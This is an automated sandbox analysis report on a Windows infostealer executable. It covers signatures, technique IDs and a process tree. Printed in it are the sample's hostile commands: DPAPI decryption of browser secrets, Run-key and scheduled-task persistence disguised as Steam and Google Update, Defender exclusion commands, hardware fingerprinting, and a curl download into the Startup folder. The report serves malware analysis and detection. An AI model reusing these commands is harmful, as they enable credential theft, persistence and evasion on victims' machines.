7afdfc51e20e5f336761b4a1964a8949428dff7b96ea8389c4db9383afe2e336

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2024, 07:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Size

37.6MB
MD5

dbcc5cfb5b91fae4370930affd3d7ef9
SHA1

5e5598375c5abeee8c18c9c28a5138e3763df29b
SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
SHA512

0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
26	4208	curl.exe
57	4812	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
112	powershell.exe
4612	powershell.exe
4932	powershell.exe
3036	powershell.exe
3036	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

pid	Process
4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tfzBIHnNOUqATcv.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
4596	cmd.exe
4976	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1564	schtasks.exe

Detects videocard installed 1 TTPs 11 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1036	WMIC.exe
4468	WMIC.exe
4248	WMIC.exe
4028	WMIC.exe
4012	WMIC.exe
3840	WMIC.exe
1284	WMIC.exe
1940	WMIC.exe
3004	WMIC.exe
4152	WMIC.exe
1232	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
1588	tasklist.exe
2332	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5096	reg.exe
4152	reg.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
3036	powershell.exe
3036	powershell.exe
736	powershell.exe
736	powershell.exe
3224	powershell.exe
3224	powershell.exe
3224	powershell.exe
112	powershell.exe
112	powershell.exe
112	powershell.exe
4612	powershell.exe
4612	powershell.exe
4612	powershell.exe
4196	powershell.exe
4196	powershell.exe
4196	powershell.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
4404	powershell.exe
4404	powershell.exe
4404	powershell.exe
3036	powershell.exe
3036	powershell.exe
3036	powershell.exe
764	powershell.exe
764	powershell.exe
764	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
3540	powershell.exe
3540	powershell.exe
3540	powershell.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	2332	tasklist.exe
Token: SeDebugPrivilege	1588	tasklist.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeIncreaseQuotaPrivilege	4560	WMIC.exe
Token: SeSecurityPrivilege	4560	WMIC.exe
Token: SeTakeOwnershipPrivilege	4560	WMIC.exe
Token: SeLoadDriverPrivilege	4560	WMIC.exe
Token: SeSystemProfilePrivilege	4560	WMIC.exe
Token: SeSystemtimePrivilege	4560	WMIC.exe
Token: SeProfSingleProcessPrivilege	4560	WMIC.exe
Token: SeIncBasePriorityPrivilege	4560	WMIC.exe
Token: SeCreatePagefilePrivilege	4560	WMIC.exe
Token: SeBackupPrivilege	4560	WMIC.exe
Token: SeRestorePrivilege	4560	WMIC.exe
Token: SeShutdownPrivilege	4560	WMIC.exe
Token: SeDebugPrivilege	4560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4560	WMIC.exe
Token: SeRemoteShutdownPrivilege	4560	WMIC.exe
Token: SeUndockPrivilege	4560	WMIC.exe
Token: SeManageVolumePrivilege	4560	WMIC.exe
Token: 33	4560	WMIC.exe
Token: 34	4560	WMIC.exe
Token: 35	4560	WMIC.exe
Token: 36	4560	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1140	WMIC.exe
Token: SeSecurityPrivilege	1140	WMIC.exe
Token: SeTakeOwnershipPrivilege	1140	WMIC.exe
Token: SeLoadDriverPrivilege	1140	WMIC.exe
Token: SeSystemProfilePrivilege	1140	WMIC.exe
Token: SeSystemtimePrivilege	1140	WMIC.exe
Token: SeProfSingleProcessPrivilege	1140	WMIC.exe
Token: SeIncBasePriorityPrivilege	1140	WMIC.exe
Token: SeCreatePagefilePrivilege	1140	WMIC.exe
Token: SeBackupPrivilege	1140	WMIC.exe
Token: SeRestorePrivilege	1140	WMIC.exe
Token: SeShutdownPrivilege	1140	WMIC.exe
Token: SeDebugPrivilege	1140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1140	WMIC.exe
Token: SeRemoteShutdownPrivilege	1140	WMIC.exe
Token: SeUndockPrivilege	1140	WMIC.exe
Token: SeManageVolumePrivilege	1140	WMIC.exe
Token: 33	1140	WMIC.exe
Token: 34	1140	WMIC.exe
Token: 35	1140	WMIC.exe
Token: 36	1140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4560	WMIC.exe
Token: SeSecurityPrivilege	4560	WMIC.exe
Token: SeTakeOwnershipPrivilege	4560	WMIC.exe
Token: SeLoadDriverPrivilege	4560	WMIC.exe
Token: SeSystemProfilePrivilege	4560	WMIC.exe
Token: SeSystemtimePrivilege	4560	WMIC.exe
Token: SeProfSingleProcessPrivilege	4560	WMIC.exe
Token: SeIncBasePriorityPrivilege	4560	WMIC.exe
Token: SeCreatePagefilePrivilege	4560	WMIC.exe
Token: SeBackupPrivilege	4560	WMIC.exe
Token: SeRestorePrivilege	4560	WMIC.exe
Token: SeShutdownPrivilege	4560	WMIC.exe
Token: SeDebugPrivilege	4560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4560	WMIC.exe
Token: SeRemoteShutdownPrivilege	4560	WMIC.exe
Token: SeUndockPrivilege	4560	WMIC.exe
Token: SeManageVolumePrivilege	4560	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4892 wrote to memory of 4768	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	85
PID 4892 wrote to memory of 4768	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	85
PID 4768 wrote to memory of 1924	4768	cmd.exe	86
PID 4768 wrote to memory of 1924	4768	cmd.exe	86
PID 4768 wrote to memory of 3036	4768	cmd.exe	87
PID 4768 wrote to memory of 3036	4768	cmd.exe	87
PID 3036 wrote to memory of 532	3036	powershell.exe	90
PID 3036 wrote to memory of 532	3036	powershell.exe	90
PID 532 wrote to memory of 3216	532	csc.exe	91
PID 532 wrote to memory of 3216	532	csc.exe	91
PID 4892 wrote to memory of 884	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	92
PID 4892 wrote to memory of 884	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	92
PID 4892 wrote to memory of 3492	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	95
PID 4892 wrote to memory of 3492	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	95
PID 884 wrote to memory of 1016	884	cmd.exe	94
PID 884 wrote to memory of 1016	884	cmd.exe	94
PID 3492 wrote to memory of 2332	3492	cmd.exe	96
PID 3492 wrote to memory of 2332	3492	cmd.exe	96
PID 4892 wrote to memory of 4572	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	99
PID 4892 wrote to memory of 4572	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	99
PID 4892 wrote to memory of 4596	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	100
PID 4892 wrote to memory of 4596	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	100
PID 4572 wrote to memory of 1588	4572	cmd.exe	101
PID 4572 wrote to memory of 1588	4572	cmd.exe	101
PID 4596 wrote to memory of 736	4596	cmd.exe	102
PID 4596 wrote to memory of 736	4596	cmd.exe	102
PID 4892 wrote to memory of 4976	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	156
PID 4892 wrote to memory of 4976	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	156
PID 4976 wrote to memory of 3224	4976	cmd.exe	155
PID 4976 wrote to memory of 3224	4976	cmd.exe	155
PID 4892 wrote to memory of 1284	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	106
PID 4892 wrote to memory of 1284	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	106
PID 4892 wrote to memory of 3024	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	107
PID 4892 wrote to memory of 3024	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	107
PID 1284 wrote to memory of 4560	1284	cmd.exe	108
PID 1284 wrote to memory of 4560	1284	cmd.exe	108
PID 4892 wrote to memory of 1940	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	109
PID 4892 wrote to memory of 1940	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	109
PID 3024 wrote to memory of 5068	3024	cmd.exe	110
PID 3024 wrote to memory of 5068	3024	cmd.exe	110
PID 4892 wrote to memory of 3012	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	111
PID 4892 wrote to memory of 3012	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	111
PID 4892 wrote to memory of 4388	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	112
PID 4892 wrote to memory of 4388	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	112
PID 1940 wrote to memory of 1564	1940	cmd.exe	113
PID 1940 wrote to memory of 1564	1940	cmd.exe	113
PID 3012 wrote to memory of 112	3012	cmd.exe	114
PID 3012 wrote to memory of 112	3012	cmd.exe	114
PID 4388 wrote to memory of 1140	4388	cmd.exe	115
PID 4388 wrote to memory of 1140	4388	cmd.exe	115
PID 4892 wrote to memory of 3596	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	116
PID 4892 wrote to memory of 3596	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	116
PID 3596 wrote to memory of 1428	3596	cmd.exe	117
PID 3596 wrote to memory of 1428	3596	cmd.exe	117
PID 4892 wrote to memory of 3216	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	118
PID 4892 wrote to memory of 3216	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	118
PID 3216 wrote to memory of 820	3216	cmd.exe	119
PID 3216 wrote to memory of 820	3216	cmd.exe	119
PID 4892 wrote to memory of 1256	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	120
PID 4892 wrote to memory of 1256	4892	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	120
PID 1256 wrote to memory of 3504	1256	cmd.exe	171
PID 1256 wrote to memory of 3504	1256	cmd.exe	171
PID 1256 wrote to memory of 4528	1256	cmd.exe	122
PID 1256 wrote to memory of 4528	1256	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:1924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tejzmvud\tejzmvud.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:532
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F2C.tmp" "c:\Users\Admin\AppData\Local\Temp\tejzmvud\CSC56DE13A0955F4DC0B971F879BA6CCF67.TMP"
        5⤵
        
        PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:884
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3492
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,92,189,224,153,149,154,254,15,90,25,191,67,109,35,188,255,47,151,9,21,172,109,172,152,78,250,241,191,140,181,162,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,235,215,220,194,5,197,88,53,204,186,212,66,146,226,188,79,204,39,241,55,33,198,3,57,197,104,32,254,164,222,53,48,0,0,0,190,0,161,123,65,14,46,171,239,38,157,125,28,95,192,236,16,13,130,184,221,191,110,38,80,70,146,60,47,32,10,203,90,20,66,70,106,81,223,50,206,68,184,16,75,136,60,134,64,0,0,0,70,232,28,94,65,45,27,44,230,217,177,254,232,17,18,175,206,168,72,136,197,118,127,130,242,66,19,188,10,231,102,228,166,149,101,103,226,180,241,31,220,52,111,182,118,173,9,121,124,121,42,179,127,86,97,46,106,209,100,22,161,216,139,82), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,92,189,224,153,149,154,254,15,90,25,191,67,109,35,188,255,47,151,9,21,172,109,172,152,78,250,241,191,140,181,162,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,235,215,220,194,5,197,88,53,204,186,212,66,146,226,188,79,204,39,241,55,33,198,3,57,197,104,32,254,164,222,53,48,0,0,0,190,0,161,123,65,14,46,171,239,38,157,125,28,95,192,236,16,13,130,184,221,191,110,38,80,70,146,60,47,32,10,203,90,20,66,70,106,81,223,50,206,68,184,16,75,136,60,134,64,0,0,0,70,232,28,94,65,45,27,44,230,217,177,254,232,17,18,175,206,168,72,136,197,118,127,130,242,66,19,188,10,231,102,228,166,149,101,103,226,180,241,31,220,52,111,182,118,173,9,121,124,121,42,179,127,86,97,46,106,209,100,22,161,216,139,82), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,212,42,2,65,16,208,86,239,119,31,48,12,125,255,255,16,35,229,28,212,118,235,50,133,44,37,118,117,201,246,141,209,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,164,249,209,239,154,151,218,48,206,11,82,161,3,159,9,224,155,252,245,175,208,199,64,94,88,244,43,40,88,194,246,48,0,0,0,139,84,34,152,122,62,162,151,147,226,168,84,240,87,105,110,166,215,210,118,192,192,245,219,97,138,74,192,131,101,218,100,49,184,183,187,125,119,185,182,32,14,67,163,25,109,208,13,64,0,0,0,227,205,221,78,197,37,10,166,0,128,167,243,193,236,123,89,55,116,6,215,52,123,147,52,72,250,198,255,30,6,10,45,139,195,88,251,172,7,9,40,196,46,34,184,241,154,11,218,245,73,126,185,94,212,164,210,43,132,173,66,17,12,245,143), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,212,42,2,65,16,208,86,239,119,31,48,12,125,255,255,16,35,229,28,212,118,235,50,133,44,37,118,117,201,246,141,209,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,164,249,209,239,154,151,218,48,206,11,82,161,3,159,9,224,155,252,245,175,208,199,64,94,88,244,43,40,88,194,246,48,0,0,0,139,84,34,152,122,62,162,151,147,226,168,84,240,87,105,110,166,215,210,118,192,192,245,219,97,138,74,192,131,101,218,100,49,184,183,187,125,119,185,182,32,14,67,163,25,109,208,13,64,0,0,0,227,205,221,78,197,37,10,166,0,128,167,243,193,236,123,89,55,116,6,215,52,123,147,52,72,250,198,255,30,6,10,45,139,195,88,251,172,7,9,40,196,46,34,184,241,154,11,218,245,73,126,185,94,212,164,210,43,132,173,66,17,12,245,143), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:112
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jng422i3\jng422i3.cmdline"
      4⤵
      PID:4192
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4650.tmp" "c:\Users\Admin\AppData\Local\Temp\jng422i3\CSCA2C21E5FF6A6489F9A92C3DF69DBF9F2.TMP"
        5⤵
        
        PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    PID:1428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4932
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:5096
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:4152
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:3468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3504
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:1132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:2692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
